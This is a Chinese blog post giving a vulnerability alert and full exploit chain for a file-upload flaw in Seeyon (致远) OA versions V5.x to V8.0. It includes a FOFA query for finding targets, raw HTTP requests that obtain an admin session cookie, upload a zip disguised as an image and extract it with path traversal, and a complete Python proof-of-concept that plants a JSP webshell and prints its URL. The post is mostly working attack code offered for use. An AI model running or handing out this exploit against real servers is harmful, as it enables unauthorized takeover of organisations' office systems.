致远OA文件上传漏洞——可以上传webshell
致远OA文件上传漏洞预警
1.漏洞描述
致远OA是一套用于OA办公的自动化软件,该软件存在文件上传漏洞,攻击者能够上传恶意脚本文
件,从而控制服务器。
2.影响版本
致远OAV8.0,V7.1,V7.1SP1,V7.0,V7.0SP1,V7.0SP2,V7.0SP3,V6.0,V6.1SP1,
V6.1SP2,V5.x
3.漏洞复现
FOFA搜索"seeyon":
首先是一个获取管理cookie的漏洞:
1 2 3 4 5 6 7 8 9 10 11 | POST /seeyon/thirdpartyController. do HTTP/1.1 Host: 192.168.10.2 User-Agent: python-requests/2.25.1 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Length: 133 Content-Type: application/x-www-form-urlencoded method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQz NDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1 |
然后上传压缩包:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 | POST /seeyon/fileUpload. do ?method=processUpload HTTP/1.1 Host:192.168.10.2 Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.25.1 Cookie: JSESSIONID=3495C4DEF87200EA323B1CA31E3B7DF5 Content-Length: 841 Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b --59229605f98b8cf290a7b8908b34616b Content-Disposition: form-data; name= "firstSave" true --59229605f98b8cf290a7b8908b34616b Content-Disposition: form-data; name= "callMethod" resizeLayout --59229605f98b8cf290a7b8908b34616b Content-Disposition: form-data; name= "isEncrypt" 0 --59229605f98b8cf290a7b8908b34616b Content-Disposition: form-data; name= "takeOver" false --59229605f98b8cf290a7b8908b34616b Content-Disposition: form-data; name= "type" 0 --59229605f98b8cf290a7b8908b34616b Content-Disposition: form-data; name= "file1" ; filename= "11.png" Content-Type: image/png 111 --59229605f98b8cf290a7b8908b34616b-- |
然后解压:
1 2 3 4 5 6 7 8 9 10 11 12 | POST /seeyon/ajax. do HTTP/1.1 Host: 192.168.10.2 User-Agent: python-requests/2.25.1 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: application/x-www-form-urlencoded Cookie: JSESSIONID=BDF7358D4C35C6D2BB99FADFEE21F913 Content-Length: 157 method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayo utAttachment&arguments=%5B0%2C%222021-04-09%22%2C%225818374431215601542%22%5D |
完整poc:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 | #coding:utf-8 import time import datetime import zipfile import random import string import requests import re import os requests.packages.urllib3.disable_warnings() proxy = None #{'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'} ua = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" def check_file(): path = os.getcwd() file_path = os.path.join(path, "payload.zip" ) if os.path.exists(file_path): os.remove(file_path) def write_zipfile(fname, content): with zipfile.ZipFile( 'payload.zip' , mode = 'a' , compression = zipfile.ZIP_DEFLATED, ) as zf: zf.writestr( 'layout.xml' , "") zf.writestr(fname, content) def rand_str(num): ran_str = ''.join(random.sample(string.ascii_letters + string.digits, num)) return ran_str def get_cookie(targeturl): headers = { 'User-Agent' : ua, 'Content-Type' : 'application/x-www-formurlencoded' } url = '{targeturl}/seeyon/thirdpartyController.do' . format (targeturl = targeturl) post = "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1" .encode( "utf-8" ) response = requests.post(url = url,data = post,proxies = proxy,headers = headers, timeout = 60 ,verify = False ) if response and response.status_code = = 200 and 'set-cookie' in str (response.headers).lower(): cookies = response.cookies cookies = requests.utils.dict_from_cookiejar(cookies) jsessionid = cookies[ 'JSESSIONID' ] print ( "[+] get cookie:{jsessionid}" . format (jsessionid = jsessionid)) return jsessionid else : print ( '[-] get cookie error !' ) def upload_zip(targeturl,cookie): url = '{targeturl}/seeyon/fileUpload.do?method=processUpload' . format (targeturl = targeturl) files = [( 'file1' , ( '11.png' , open ( 'payload.zip' , 'rb' ), 'application/octetstream' ))] headers = { 'Cookie' : 'JSESSIONID={cookie}' . format (cookie = cookie), 'User-Agent' : ua} post = { 'callMethod' : 'resizeLayout' , 'firstSave' : "true" , 'takeOver' : "false" , "type" : '0' , 'isEncrypt' : "0" } response = requests.post(url = url,files = files,data = post, headers = headers,proxies = proxy,timeout = 60 ,verify = False ) if response and response.status_code = = 200 and 'fileurls=' in response.text: fileid = re.findall( 'fileurls=fileurls\+","\+\'(.+)\'' ,response.text,re.I) if len (fileid) > 0 : print ( "[+] get fileid:{fileid}" . format (fileid = fileid)) return fileid[ 0 ] else : print ( "[-] get fileid error !" ) def extract_file(targeturl,cookie,fileid): url = '{targeturl}/seeyon/ajax.do' . format (targeturl = targeturl) headers = { 'Cookie' : 'JSESSIONID={cookie}' . format (cookie = cookie), 'User-Agent' : ua, 'Content-Type' : 'application/x-www-form-urlencoded' } datestr = time.strftime( '%Y-%m-%d' ) post = f 'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22{datestr}%22%2C%22{fileid}%22%5D' response = requests.post(url, data = post,headers = headers,proxies = proxy,timeout = 60 ,verify = False ) if response.status_code = = 500 and "Error" in response.text: print ( "[+] extract file is ok!" ) return True else : print ( "[-] extract file error !" ) def main(targeturl): fname = f '../{rand_str(8)}.jsp' shell = r '<% out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("ZTE2NTQyMTExMGJhMDMwOTlhMWMwMzkzMzczYzViNDM=")));new java.io.File(application.getRealPath(request.getServletPath())).delete();%>' check_file() write_zipfile(fname,shell) cookie = get_cookie(targeturl) fileid = upload_zip(targeturl, cookie) if extract_file(targeturl, cookie, fileid): url = targeturl + '/seeyon/common/designer/pageLayout/{fname}' . format (fname = fname.split( '/' )[ 1 ]) print ( "webshell path: {url}" . format (url = url)) if __name__ = = '__main__' : targeturl = "http://xxx" main(targeturl) |
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
· 没有源码,如何修改代码逻辑?
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· DeepSeek 开源周回顾「GitHub 热点速览」
2020-08-19 初探零信任模型——就是假设所有的设备、人员等都是不可信的,在此基础上构建安全策略
2019-08-19 下载恶意pcap包的网站
2019-08-19 metasploit 一款开源的渗透测试框架
2019-08-19 TCN时间卷积网络——解决LSTM的并发问题